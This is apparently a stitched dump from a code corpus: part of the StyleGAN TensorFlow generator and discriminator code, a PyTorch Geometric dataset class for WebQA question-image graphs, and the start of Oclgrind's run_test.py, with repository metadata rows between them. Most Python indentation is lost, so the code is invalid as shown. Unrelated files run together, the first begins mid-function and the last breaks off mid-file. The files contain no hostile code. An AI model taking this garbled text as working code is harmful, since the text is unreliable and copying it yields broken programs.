return tf.nn.conv2d(x, w, strides=[1,1,1,1], padding='SAME', data_format='NCHW')
#----------------------------------------------------------------------------
# Fused convolution + scaling.
# Faster and uses less memory than performing the operations separately.
def upscale2d_conv2d(x, fmaps, kernel, fused_scale='auto', **kwargs):
assert kernel >= 1 and kernel % 2 == 1
assert fused_scale in [True, False, 'auto']
if fused_scale == 'auto':
fused_scale = min(x.shape[2:]) * 2 >= 128
# Not fused => call the individual ops directly.
if not fused_scale:
return conv2d(upscale2d(x), fmaps, kernel, **kwargs)
# Fused => perform both ops simultaneously using tf.nn.conv2d_transpose().
w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs)
w = tf.transpose(w, [0, 1, 3, 2]) # [kernel, kernel, fmaps_out, fmaps_in]
w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT')
w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]])
w = tf.cast(w, x.dtype)
os = [tf.shape(x)[0], fmaps, x.shape[2] * 2, x.shape[3] * 2]
return tf.nn.conv2d_transpose(x, w, os, strides=[1,1,2,2], padding='SAME', data_format='NCHW')
def conv2d_downscale2d(x, fmaps, kernel, fused_scale='auto', **kwargs):
assert kernel >= 1 and kernel % 2 == 1
assert fused_scale in [True, False, 'auto']
if fused_scale == 'auto':
fused_scale = min(x.shape[2:]) >= 128
# Not fused => call the individual ops directly.
if not fused_scale:
return downscale2d(conv2d(x, fmaps, kernel, **kwargs))
# Fused => perform both ops simultaneously using tf.nn.conv2d().
w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs)
w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT')
w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) * 0.25
w = tf.cast(w, x.dtype)
return tf.nn.conv2d(x, w, strides=[1,1,2,2], padding='SAME', data_format='NCHW')
#----------------------------------------------------------------------------
# Apply bias to the given activation tensor.
def apply_bias(x, lrmul=1):
b = tf.get_variable('bias', shape=[x.shape[1]], initializer=tf.initializers.zeros()) * lrmul
b = tf.cast(b, x.dtype)
if len(x.shape) == 2:
return x + b
return x + tf.reshape(b, [1, -1, 1, 1])
#----------------------------------------------------------------------------
# Leaky ReLU activation. More efficient than tf.nn.leaky_relu() and supports FP16.
def leaky_relu(x, alpha=0.2):
with tf.variable_scope('LeakyReLU'):
alpha = tf.constant(alpha, dtype=x.dtype, name='alpha')
@tf.custom_gradient
def func(x):
y = tf.maximum(x, x * alpha)
@tf.custom_gradient
def grad(dy):
dx = tf.where(y >= 0, dy, dy * alpha)
return dx, lambda ddx: tf.where(y >= 0, ddx, ddx * alpha)
return y, grad
return func(x)
#----------------------------------------------------------------------------
# Pixelwise feature vector normalization.
def pixel_norm(x, epsilon=1e-8):
with tf.variable_scope('PixelNorm'):
epsilon = tf.constant(epsilon, dtype=x.dtype, name='epsilon')
return x * tf.rsqrt(tf.reduce_mean(tf.square(x), axis=1, keepdims=True) + epsilon)
#----------------------------------------------------------------------------
# Instance normalization.
def instance_norm(x, epsilon=1e-8):
assert len(x.shape) == 4 # NCHW
with tf.variable_scope('InstanceNorm'):
orig_dtype = x.dtype
x = tf.cast(x, tf.float32)
x -= tf.reduce_mean(x, axis=[2,3], keepdims=True)
epsilon = tf.constant(epsilon, dtype=x.dtype, name='epsilon')
x *= tf.rsqrt(tf.reduce_mean(tf.square(x), axis=[2,3], keepdims=True) + epsilon)
x = tf.cast(x, orig_dtype)
return x
#----------------------------------------------------------------------------
# Style modulation.
def style_mod(x, dlatent, **kwargs):
with tf.variable_scope('StyleMod'):
style = apply_bias(dense(dlatent, fmaps=x.shape[1]*2, gain=1, **kwargs))
style = tf.reshape(style, [-1, 2, x.shape[1]] + [1] * (len(x.shape) - 2))
return x * (style[:,0] + 1) + style[:,1]
#----------------------------------------------------------------------------
# Noise input.
def apply_noise(x, noise_var=None, randomize_noise=True):
assert len(x.shape) == 4 # NCHW
with tf.variable_scope('Noise'):
if noise_var is None or randomize_noise:
noise = tf.random_normal([tf.shape(x)[0], 1, x.shape[2], x.shape[3]], dtype=x.dtype)
else:
noise = tf.cast(noise_var, x.dtype)
weight = tf.get_variable('weight', shape=[x.shape[1].value], initializer=tf.initializers.zeros())
return x + noise * tf.reshape(tf.cast(weight, x.dtype), [1, -1, 1, 1])
#----------------------------------------------------------------------------
# Minibatch standard deviation.
def minibatch_stddev_layer(x, group_size=4, num_new_features=1):
with tf.variable_scope('MinibatchStddev'):
group_size = tf.minimum(group_size, tf.shape(x)[0]) # Minibatch must be divisible by (or smaller than) group_size.
s = x.shape # [NCHW] Input shape.
y = tf.reshape(x, [group_size, -1, num_new_features, s[1]//num_new_features, s[2], s[3]]) # [GMncHW] Split minibatch into M groups of size G. Split channels into n channel groups c.
y = tf.cast(y, tf.float32) # [GMncHW] Cast to FP32.
y -= tf.reduce_mean(y, axis=0, keepdims=True) # [GMncHW] Subtract mean over group.
y = tf.reduce_mean(tf.square(y), axis=0) # [MncHW] Calc variance over group.
y = tf.sqrt(y + 1e-8) # [MncHW] Calc stddev over group.
y = tf.reduce_mean(y, axis=[2,3,4], keepdims=True) # [Mn111] Take average over fmaps and pixels.
y = tf.reduce_mean(y, axis=[2]) # [Mn11] Split channels into c channel groups
y = tf.cast(y, x.dtype) # [Mn11] Cast back to original data type.
y = tf.tile(y, [group_size, 1, s[2], s[3]]) # [NnHW] Replicate over group and pixels.
return tf.concat([x, y], axis=1) # [NCHW] Append as new fmap.
#----------------------------------------------------------------------------
# Style-based generator used in the StyleGAN paper.
# Composed of two sub-networks (G_mapping and G_synthesis) that are defined below.
def G_style(
latents_in, # First input: Latent vectors (Z) [minibatch, latent_size].
labels_in, # Second input: Conditioning labels [minibatch, label_size].
truncation_psi = 0.7, # Style strength multiplier for the truncation trick. None = disable.
truncation_cutoff = 8, # Number of layers for which to apply the truncation trick. None = disable.
truncation_psi_val = None, # Value for truncation_psi to use during validation.
truncation_cutoff_val = None, # Value for truncation_cutoff to use during validation.
dlatent_avg_beta = 0.995, # Decay for tracking the moving average of W during training. None = disable.
style_mixing_prob = 0.9, # Probability of mixing styles during training. None = disable.
is_training = False, # Network is under training? Enables and disables specific features.
is_validation = False, # Network is under validation? Chooses which value to use for truncation_psi.
is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation.
components = dnnlib.EasyDict(), # Container for sub-networks. Retained between calls.
**kwargs): # Arguments for sub-networks (G_mapping and G_synthesis).
# Validate arguments.
assert not is_training or not is_validation
assert isinstance(components, dnnlib.EasyDict)
if is_validation:
truncation_psi = truncation_psi_val
truncation_cutoff = truncation_cutoff_val
if is_training or (truncation_psi is not None and not tflib.is_tf_expression(truncation_psi) and truncation_psi == 1):
truncation_psi = None
if is_training or (truncation_cutoff is not None and not tflib.is_tf_expression(truncation_cutoff) and truncation_cutoff <= 0):
truncation_cutoff = None
if not is_training or (dlatent_avg_beta is not None and not tflib.is_tf_expression(dlatent_avg_beta) and dlatent_avg_beta == 1):
dlatent_avg_beta = None
if not is_training or (style_mixing_prob is not None and not tflib.is_tf_expression(style_mixing_prob) and style_mixing_prob <= 0):
style_mixing_prob = None
# Setup components.
if 'synthesis' not in components:
components.synthesis = tflib.Network('G_synthesis', func_name=G_synthesis, **kwargs)
num_layers = components.synthesis.input_shape[1]
dlatent_size = components.synthesis.input_shape[2]
if 'mapping' not in components:
components.mapping = tflib.Network('G_mapping', func_name=G_mapping, dlatent_broadcast=num_layers, **kwargs)
# Setup variables.
lod_in = tf.get_variable('lod', initializer=np.float32(0), trainable=False)
dlatent_avg = tf.get_variable('dlatent_avg', shape=[dlatent_size], initializer=tf.initializers.zeros(), trainable=False)
# Evaluate mapping network.
dlatents = components.mapping.get_output_for(latents_in, labels_in, **kwargs)
# Update moving average of W.
if dlatent_avg_beta is not None:
with tf.variable_scope('DlatentAvg'):
batch_avg = tf.reduce_mean(dlatents[:, 0], axis=0)
update_op = tf.assign(dlatent_avg, tflib.lerp(batch_avg, dlatent_avg, dlatent_avg_beta))
with tf.control_dependencies([update_op]):
dlatents = tf.identity(dlatents)
# Perform style mixing regularization.
if style_mixing_prob is not None:
with tf.name_scope('StyleMix'):
latents2 = tf.random_normal(tf.shape(latents_in))
dlatents2 = components.mapping.get_output_for(latents2, labels_in, **kwargs)
layer_idx = np.arange(num_layers)[np.newaxis, :, np.newaxis]
cur_layers = num_layers - tf.cast(lod_in, tf.int32) * 2
mixing_cutoff = tf.cond(
tf.random_uniform([], 0.0, 1.0) < style_mixing_prob,
lambda: tf.random_uniform([], 1, cur_layers, dtype=tf.int32),
lambda: cur_layers)
dlatents = tf.where(tf.broadcast_to(layer_idx < mixing_cutoff, tf.shape(dlatents)), dlatents, dlatents2)
# Apply truncation trick.
if truncation_psi is not None and truncation_cutoff is not None:
with tf.variable_scope('Truncation'):
layer_idx = np.arange(num_layers)[np.newaxis, :, np.newaxis]
ones = np.ones(layer_idx.shape, dtype=np.float32)
coefs = tf.where(layer_idx < truncation_cutoff, truncation_psi * ones, ones)
dlatents = tflib.lerp(dlatent_avg, dlatents, coefs)
# Evaluate synthesis network.
with tf.control_dependencies([tf.assign(components.synthesis.find_var('lod'), lod_in)]):
images_out = components.synthesis.get_output_for(dlatents, force_clean_graph=is_template_graph, **kwargs)
return tf.identity(images_out, name='images_out')
#----------------------------------------------------------------------------
# Mapping network used in the StyleGAN paper.
def G_mapping(
latents_in, # First input: Latent vectors (Z) [minibatch, latent_size].
labels_in, # Second input: Conditioning labels [minibatch, label_size].
latent_size = 512, # Latent vector (Z) dimensionality.
label_size = 0, # Label dimensionality, 0 if no labels.
dlatent_size = 512, # Disentangled latent (W) dimensionality.
dlatent_broadcast = None, # Output disentangled latent (W) as [minibatch, dlatent_size] or [minibatch, dlatent_broadcast, dlatent_size].
mapping_layers = 8, # Number of mapping layers.
mapping_fmaps = 512, # Number of activations in the mapping layers.
mapping_lrmul = 0.01, # Learning rate multiplier for the mapping layers.
mapping_nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu'.
use_wscale = True, # Enable equalized learning rate?
normalize_latents = True, # Normalize latent vectors (Z) before feeding them to the mapping layers?
dtype = 'float32', # Data type to use for activations and outputs.
**_kwargs): # Ignore unrecognized keyword args.
act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[mapping_nonlinearity]
# Inputs.
latents_in.set_shape([None, latent_size])
labels_in.set_shape([None, label_size])
latents_in = tf.cast(latents_in, dtype)
labels_in = tf.cast(labels_in, dtype)
x = latents_in
# Embed labels and concatenate them with latents.
if label_size:
with tf.variable_scope('LabelConcat'):
w = tf.get_variable('weight', shape=[label_size, latent_size], initializer=tf.initializers.random_normal())
y = tf.matmul(labels_in, tf.cast(w, dtype))
x = tf.concat([x, y], axis=1)
# Normalize latents.
if normalize_latents:
x = pixel_norm(x)
# Mapping layers.
for layer_idx in range(mapping_layers):
with tf.variable_scope('Dense%d' % layer_idx):
fmaps = dlatent_size if layer_idx == mapping_layers - 1 else mapping_fmaps
x = dense(x, fmaps=fmaps, gain=gain, use_wscale=use_wscale, lrmul=mapping_lrmul)
x = apply_bias(x, lrmul=mapping_lrmul)
x = act(x)
# Broadcast.
if dlatent_broadcast is not None:
with tf.variable_scope('Broadcast'):
x = tf.tile(x[:, np.newaxis], [1, dlatent_broadcast, 1])
# Output.
assert x.dtype == tf.as_dtype(dtype)
return tf.identity(x, name='dlatents_out')
#----------------------------------------------------------------------------
# Synthesis network used in the StyleGAN paper.
def G_synthesis(
dlatents_in, # Input: Disentangled latents (W) [minibatch, num_layers, dlatent_size].
dlatent_size = 512, # Disentangled latent (W) dimensionality.
num_channels = 3, # Number of output color channels.
resolution = 1024, # Output resolution.
fmap_base = 8192, # Overall multiplier for the number of feature maps.
fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution.
fmap_max = 512, # Maximum number of feature maps in any layer.
use_styles = True, # Enable style inputs?
const_input_layer = True, # First layer is a learned constant?
use_noise = True, # Enable noise inputs?
randomize_noise = True, # True = randomize noise inputs every time (non-deterministic), False = read noise inputs from variables.
nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu'
use_wscale = True, # Enable equalized learning rate?
use_pixel_norm = False, # Enable pixelwise feature vector normalization?
use_instance_norm = True, # Enable instance normalization?
dtype = 'float32', # Data type to use for activations and outputs.
fused_scale = 'auto', # True = fused convolution + scaling, False = separate ops, 'auto' = decide automatically.
blur_filter = [1,2,1], # Low-pass filter to apply when resampling activations. None = no filtering.
structure = 'auto', # 'fixed' = no progressive growing, 'linear' = human-readable, 'recursive' = efficient, 'auto' = select automatically.
is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation.
force_clean_graph = False, # True = construct a clean graph that looks nice in TensorBoard, False = default behavior.
**_kwargs): # Ignore unrecognized keyword args.
resolution_log2 = int(np.log2(resolution))
assert resolution == 2**resolution_log2 and resolution >= 4
def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max)
def blur(x): return blur2d(x, blur_filter) if blur_filter else x
if is_template_graph: force_clean_graph = True
if force_clean_graph: randomize_noise = False
if structure == 'auto': structure = 'linear' if force_clean_graph else 'recursive'
act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[nonlinearity]
num_layers = resolution_log2 * 2 - 2
num_styles = num_layers if use_styles else 1
images_out = None
# Primary inputs.
dlatents_in.set_shape([None, num_styles, dlatent_size])
dlatents_in = tf.cast(dlatents_in, dtype)
lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0), trainable=False), dtype)
# Noise inputs.
noise_inputs = []
if use_noise:
for layer_idx in range(num_layers):
res = layer_idx // 2 + 2
shape = [1, use_noise, 2**res, 2**res]
noise_inputs.append(tf.get_variable('noise%d' % layer_idx, shape=shape, initializer=tf.initializers.random_normal(), trainable=False))
# Things to do at the end of each layer.
def layer_epilogue(x, layer_idx):
if use_noise:
x = apply_noise(x, noise_inputs[layer_idx], randomize_noise=randomize_noise)
x = apply_bias(x)
x = act(x)
if use_pixel_norm:
x = pixel_norm(x)
if use_instance_norm:
x = instance_norm(x)
if use_styles:
x = style_mod(x, dlatents_in[:, layer_idx], use_wscale=use_wscale)
return x
# Early layers.
with tf.variable_scope('4x4'):
if const_input_layer:
with tf.variable_scope('Const'):
x = tf.get_variable('const', shape=[1, nf(1), 4, 4], initializer=tf.initializers.ones())
x = layer_epilogue(tf.tile(tf.cast(x, dtype), [tf.shape(dlatents_in)[0], 1, 1, 1]), 0)
else:
with tf.variable_scope('Dense'):
                x = dense(dlatents_in[:, 0], fmaps=nf(1)*16, gain=gain/4, use_wscale=use_wscale) # tweak gain to match the official implementation of Progressive GAN
x = layer_epilogue(tf.reshape(x, [-1, nf(1), 4, 4]), 0)
with tf.variable_scope('Conv'):
x = layer_epilogue(conv2d(x, fmaps=nf(1), kernel=3, gain=gain, use_wscale=use_wscale), 1)
# Building blocks for remaining layers.
def block(res, x): # res = 3..resolution_log2
with tf.variable_scope('%dx%d' % (2**res, 2**res)):
with tf.variable_scope('Conv0_up'):
x = layer_epilogue(blur(upscale2d_conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale, fused_scale=fused_scale)), res*2-4)
with tf.variable_scope('Conv1'):
x = layer_epilogue(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale), res*2-3)
return x
def torgb(res, x): # res = 2..resolution_log2
lod = resolution_log2 - res
with tf.variable_scope('ToRGB_lod%d' % lod):
return apply_bias(conv2d(x, fmaps=num_channels, kernel=1, gain=1, use_wscale=use_wscale))
# Fixed structure: simple and efficient, but does not support progressive growing.
if structure == 'fixed':
for res in range(3, resolution_log2 + 1):
x = block(res, x)
images_out = torgb(resolution_log2, x)
# Linear structure: simple but inefficient.
if structure == 'linear':
images_out = torgb(2, x)
for res in range(3, resolution_log2 + 1):
lod = resolution_log2 - res
x = block(res, x)
img = torgb(res, x)
images_out = upscale2d(images_out)
with tf.variable_scope('Grow_lod%d' % lod):
images_out = tflib.lerp_clip(img, images_out, lod_in - lod)
# Recursive structure: complex but efficient.
if structure == 'recursive':
def cset(cur_lambda, new_cond, new_lambda):
return lambda: tf.cond(new_cond, new_lambda, cur_lambda)
def grow(x, res, lod):
y = block(res, x)
img = lambda: upscale2d(torgb(res, y), 2**lod)
img = cset(img, (lod_in > lod), lambda: upscale2d(tflib.lerp(torgb(res, y), upscale2d(torgb(res - 1, x)), lod_in - lod), 2**lod))
if lod > 0: img = cset(img, (lod_in < lod), lambda: grow(y, res + 1, lod - 1))
return img()
images_out = grow(x, 3, resolution_log2 - 3)
assert images_out.dtype == tf.as_dtype(dtype)
return tf.identity(images_out, name='images_out')
#----------------------------------------------------------------------------
# Discriminator used in the StyleGAN paper.
def D_basic(
images_in, # First input: Images [minibatch, channel, height, width].
labels_in, # Second input: Labels [minibatch, label_size].
num_channels = 1, # Number of input color channels. Overridden based on dataset.
resolution = 32, # Input resolution. Overridden based on dataset.
label_size = 0, # Dimensionality of the labels, 0 if no labels. Overridden based on dataset.
fmap_base = 8192, # Overall multiplier for the number of feature maps.
fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution.
fmap_max = 512, # Maximum number of feature maps in any layer.
nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu',
use_wscale = True, # Enable equalized learning rate?
mbstd_group_size = 4, # Group size for the minibatch standard deviation layer, 0 = disable.
mbstd_num_features = 1, # Number of features for the minibatch standard deviation layer.
dtype = 'float32', # Data type to use for activations and outputs.
fused_scale = 'auto', # True = fused convolution + scaling, False = separate ops, 'auto' = decide automatically.
blur_filter = [1,2,1], # Low-pass filter to apply when resampling activations. None = no filtering.
structure = 'auto', # 'fixed' = no progressive growing, 'linear' = human-readable, 'recursive' = efficient, 'auto' = select automatically.
is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation.
**_kwargs): # Ignore unrecognized keyword args.
resolution_log2 = int(np.log2(resolution))
assert resolution == 2**resolution_log2 and resolution >= 4
def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max)
def blur(x): return blur2d(x, blur_filter) if blur_filter else x
if structure == 'auto': structure = 'linear' if is_template_graph else 'recursive'
act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[nonlinearity]
images_in.set_shape([None, num_channels, resolution, resolution])
labels_in.set_shape([None, label_size])
images_in = tf.cast(images_in, dtype)
labels_in = tf.cast(labels_in, dtype)
lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0.0), trainable=False), dtype)
scores_out = None
# Building blocks.
def fromrgb(x, res): # res = 2..resolution_log2
with tf.variable_scope('FromRGB_lod%d' % (resolution_log2 - res)):
return act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=1, gain=gain, use_wscale=use_wscale)))
def block(x, res): # res = 2..resolution_log2
with tf.variable_scope('%dx%d' % (2**res, 2**res)):
if res >= 3: # 8x8 and up
with tf.variable_scope('Conv0'):
x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale)))
with tf.variable_scope('Conv1_down'):
x = act(apply_bias(conv2d_downscale2d(blur(x), fmaps=nf(res-2), kernel=3, gain=gain, use_wscale=use_wscale, fused_scale=fused_scale)))
else: # 4x4
if mbstd_group_size > 1:
x = minibatch_stddev_layer(x, mbstd_group_size, mbstd_num_features)
with tf.variable_scope('Conv'):
x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale)))
with tf.variable_scope('Dense0'):
x = act(apply_bias(dense(x, fmaps=nf(res-2), gain=gain, use_wscale=use_wscale)))
with tf.variable_scope('Dense1'):
x = apply_bias(dense(x, fmaps=max(label_size, 1), gain=1, use_wscale=use_wscale))
return x
# Fixed structure: simple and efficient, but does not support progressive growing.
if structure == 'fixed':
x = fromrgb(images_in, resolution_log2)
for res in range(resolution_log2, 2, -1):
x = block(x, res)
scores_out = block(x, 2)
# Linear structure: simple but inefficient.
if structure == 'linear':
img = images_in
x = fromrgb(img, resolution_log2)
for res in range(resolution_log2, 2, -1):
lod = resolution_log2 - res
x = block(x, res)
img = downscale2d(img)
y = fromrgb(img, res - 1)
with tf.variable_scope('Grow_lod%d' % lod):
x = tflib.lerp_clip(x, y, lod_in - lod)
scores_out = block(x, 2)
# Recursive structure: complex but efficient.
if structure == 'recursive':
def cset(cur_lambda, new_cond, new_lambda):
return lambda: tf.cond(new_cond, new_lambda, cur_lambda)
def grow(res, lod):
x = lambda: fromrgb(downscale2d(images_in, 2**lod), res)
if lod > 0: x = cset(x, (lod_in < lod), lambda: grow(res + 1, lod - 1))
x = block(x(), res); y = lambda: x
if res > 2: y = cset(y, (lod_in > lod), lambda: tflib.lerp(x, fromrgb(downscale2d(images_in, 2**(lod+1)), res - 1), lod_in - lod))
return y()
scores_out = grow(2, resolution_log2 - 2)
# Label conditioning from "Which Training Methods for GANs do actually Converge?"
if label_size:
with tf.variable_scope('LabelSwitch'):
scores_out = tf.reduce_sum(scores_out * labels_in, axis=1, keepdims=True)
assert scores_out.dtype == tf.as_dtype(dtype)
scores_out = tf.identity(scores_out, name='scores_out')
return scores_out
#----------------------------------------------------------------------------
| 50.435045 | 191 | 0.591051 |
4a1b6fde85db573d81d907b69bd9ec34be3cf56a
| 6,525 |
py
|
Python
|
multimodal/graph/node-based/dataset.py
|
shubham-gupta-iitr/mmmlX
|
3485e6191e0e45bf1c8168e4e928a36ab9264d22
|
[
"Apache-2.0"
] | null | null | null |
multimodal/graph/node-based/dataset.py
|
shubham-gupta-iitr/mmmlX
|
3485e6191e0e45bf1c8168e4e928a36ab9264d22
|
[
"Apache-2.0"
] | null | null | null |
multimodal/graph/node-based/dataset.py
|
shubham-gupta-iitr/mmmlX
|
3485e6191e0e45bf1c8168e4e928a36ab9264d22
|
[
"Apache-2.0"
] | 1 |
2022-02-12T23:38:10.000Z
|
2022-02-12T23:38:10.000Z
|
import os.path as osp
import typing
from numpy.lib.utils import source
import torch
# from torch_geometric.data import InMemoryDataset
from torch_geometric.data import Data, Dataset
from tqdm import tqdm
import numpy as np
from utils import get_ids, load_bert_feats, load_data, load_image_feats
import torch_geometric.transforms as T
class WebQnaDataset(Dataset):
def __init__(self, root, val=False, transform=None, pre_transform=None):
self._WebQna_dataset = load_data()
self._question_ids = get_ids(self._WebQna_dataset, val=val)
self._processed_file_names = ["node_"+str(q)+".pt" for q in self._question_ids]
self._bert_feats = load_bert_feats()
self._image_feats = load_image_feats()
self._caption_feats = {}
self._question_feats = {}
self._question_ids = self._question_ids[:18000]
t_id = self._question_ids[-1]
t2_id = self._question_ids[0]
for id in self._question_ids:
for k in self._bert_feats[id].keys():
if k=='Q':
self._question_feats[id] = torch.tensor(self._bert_feats[id]['Q'])
elif 'img' in k:
for img_k in self._bert_feats[id][k].keys():
self._caption_feats[img_k] = torch.tensor(self._bert_feats[id][k][img_k])
# print(self._question_feats[t_id])
# print(self._question_feats[t2_id])
# print(self._WebQna_dataset[t_id]['Q'])
# print(t_id)
# for id in self._question_feats:
# if len(self._WebQna_dataset[id]['img_posFacts']) > 1:
# print(self._WebQna_dataset[id]['img_posFacts'])
# break
super().__init__(root, transform, pre_transform)
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return self._processed_file_names
# return []
def len(self):
return len(self._question_ids)
pass
def get(self, idx:int)-> Data:
y = []
x = []
id = self._question_ids[idx]
ques_feat = self._question_feats[id]
for pos_image_dict in self._WebQna_dataset[id]['img_posFacts']:
image_id = pos_image_dict['image_id']
pos_image_feat = self._image_feats[image_id]
pos_image_caption_feat = self._caption_feats[image_id]
# node_features = torch.cat((ques_feat, pos_image_feat, pos_image_caption_feat),dim=-1).unsqueeze(0)
node_features = torch.cat((ques_feat, pos_image_caption_feat, pos_image_feat),dim=-1).unsqueeze(0)
x.append(node_features)
y.append(1)
# y.append([0,1])
for neg_image_dict in self._WebQna_dataset[id]['img_negFacts']:
image_id = neg_image_dict['image_id']
neg_image_feat = self._image_feats[image_id]
neg_image_caption_feat = self._caption_feats[image_id]
# node_features = torch.cat((ques_feat, neg_image_feat, neg_image_caption_feat),dim=-1).unsqueeze(0)
node_features = torch.cat((ques_feat, neg_image_caption_feat, neg_image_feat),dim=-1).unsqueeze(0)
x.append(node_features)
y.append(0)
# y.append([1,0])
# for sh in x:
# # print(sh[0].shape[0])
# if sh[0].shape[0] != 768:
# print("missing q")
# break
# if sh[2].shape[0] != 768:
# print("missing cap")
# break
node_idx = [i for i in range(len(y))]
# node_idx_idx = np.arange(start=0,stop=len(y),step=1)
# node_idx = list(np.random.permutation(node_idx))
# print(node_idx)
source_nodes = []
for i in range(len(y)):
source_nodes += [i]*(len(y)-1)
target_nodes = []
for i in range(len(y)):
target_nodes += node_idx[:i] + node_idx[i+1:]
# source_nodes = node_idx[:-1]
# target_nodes = node_idx[1:]
# print(len(source_nodes), len(target_nodes))
# assert False
# edge_index = torch.tensor([source_nodes + target_nodes, target_nodes + source_nodes], dtype=torch.long)
edge_index = torch.tensor([source_nodes, target_nodes], dtype=torch.long)
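        # Illustrative aside (not in the original file): for len(y) == 3 the two
        # loops above enumerate every ordered pair of distinct nodes, i.e. a
        # fully connected graph without self-loops:
        #   source_nodes == [0, 0, 1, 1, 2, 2]
        #   target_nodes == [1, 2, 0, 2, 0, 1]
        # so edge_index has shape [2, 6]; self-loops are only added later by
        # T.AddSelfLoops().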
x = torch.cat(x,dim=0)
# y = torch.FloatTensor(y)
y = torch.LongTensor(y)
# y = torch.IntTensor(y)
data = Data(x=x, edge_index=edge_index, y=y)
data = T.ToUndirected()(data)
data = T.AddSelfLoops()(data)
data = T.NormalizeFeatures()(data)
return data
# def process(self):
# for id in tqdm(self._question_ids):
# # y = []
# # x = []
# # ques_feat = torch.tensor(self._question_feats[id])
# # for pos_image_dict in self._WebQna_dataset[id]['img_posFacts']:
# # image_id = pos_image_dict['image_id']
# # pos_image_feat = self._image_feats[image_id]
# # pos_image_caption_feat = self._caption_feats[image_id]
# # node_features = [ques_feat,pos_image_feat, pos_image_caption_feat]
# # x.append(node_features)
# # y.append(1)
# # for pos_image_dict in self._WebQna_dataset[id]['img_negFacts']:
# # image_id = pos_image_dict['image_id']
# # pos_image_feat = self._image_feats[image_id]
# # pos_image_caption_feat = self._caption_feats[image_id]
# # node_features = [ques_feat,pos_image_feat, pos_image_caption_feat]
# # x.append(node_features)
# # y.append(0)
# # for sh in x:
# # # print(sh[0].shape[0])
# # if sh[0].shape[0] != 768:
# # print("missing q")
# # break
# # if sh[2].shape[0] != 768:
# # print("missing cap")
# # break
# # node_idx = [i for i in range(len(y))]
# # source_nodes = node_idx[:-1]
# # target_nodes = node_idx[1:]
# # edge_index = torch.tensor([source_nodes, target_nodes], dtype=torch.long)
# # y = torch.FloatTensor(y)
# # data = Data(x=x, edge_index=edge_index, y=y)
# # torch.save(data, osp.join(self.processed_dir, f'node_{id}.pt'))
| 42.096774 | 113 | 0.56613 |
4a1b6ff2ce476b0c8d5daef0e0670d8d2c8d16dc
| 128 |
py
|
Python
|
sharktopoda_client/localization/Preconditions.py
|
kevinsbarnard/sharktopoda-client-py
|
21130b19436f193bd76751613a529512d76d9e84
|
[
"MIT"
] | null | null | null |
sharktopoda_client/localization/Preconditions.py
|
kevinsbarnard/sharktopoda-client-py
|
21130b19436f193bd76751613a529512d76d9e84
|
[
"MIT"
] | 2 |
2021-11-19T23:25:39.000Z
|
2021-11-19T23:25:42.000Z
|
sharktopoda_client/localization/Preconditions.py
|
kevinsbarnard/sharktopoda-client-py
|
21130b19436f193bd76751613a529512d76d9e84
|
[
"MIT"
] | null | null | null |
class Preconditions:
@staticmethod
def require(ok: bool, msg: str):
if not ok:
raise ValueError(msg)
| 25.6 | 36 | 0.601563 |
4a1b702476bd548ccfeaa8f47ea9faf4c0eadd4f
| 4,761 |
py
|
Python
|
tests/run_test.py
|
huypn12/Oclgrind
|
5c9a39f2f6a6c0d0ab3d09cc4da046d41e09c214
|
[
"BSD-3-Clause"
] | 284 |
2015-01-20T19:21:39.000Z
|
2022-03-14T08:42:44.000Z
|
tests/run_test.py
|
huypn12/Oclgrind
|
5c9a39f2f6a6c0d0ab3d09cc4da046d41e09c214
|
[
"BSD-3-Clause"
] | 133 |
2015-01-17T11:51:23.000Z
|
2022-03-03T11:54:21.000Z
|
tests/run_test.py
|
huypn12/Oclgrind
|
5c9a39f2f6a6c0d0ab3d09cc4da046d41e09c214
|
[
"BSD-3-Clause"
] | 67 |
2015-03-24T18:02:38.000Z
|
2022-01-07T13:34:06.000Z
|
# run_test.py (Oclgrind)
# Copyright (c) 2013-2019, James Price and Simon McIntosh-Smith,
# University of Bristol. All rights reserved.
#
# This program is provided under a three-clause BSD license. For full
# license terms please see the LICENSE file distributed with this
# source code.
import errno
import os
import re
import subprocess
import sys
# Check arguments
if len(sys.argv) != 3:
print('Usage: python run_test.py OCLGRIND-EXE TEST_EXE|TEST.sim')
sys.exit(1)
if not os.path.isfile(sys.argv[2]):
print('Test file not found')
sys.exit(1)
# Construct paths to test inputs/outputs
oclgrind_exe = sys.argv[1]
test_full_path = sys.argv[2]
test_dir = os.path.dirname(os.path.realpath(test_full_path))
test_file = os.path.basename(test_full_path)
test_name = os.path.splitext(test_file)[0]
current_dir = os.getcwd()
if test_file.endswith('.sim'):
test_inp = test_full_path[:-4] + '.inp'
test_ref = test_full_path[:-4] + '.ref'
else:
if test_full_path[0] == '/':
rel_path = test_full_path[test_full_path.find('/tests/') + 7:]
else:
rel_path = test_full_path
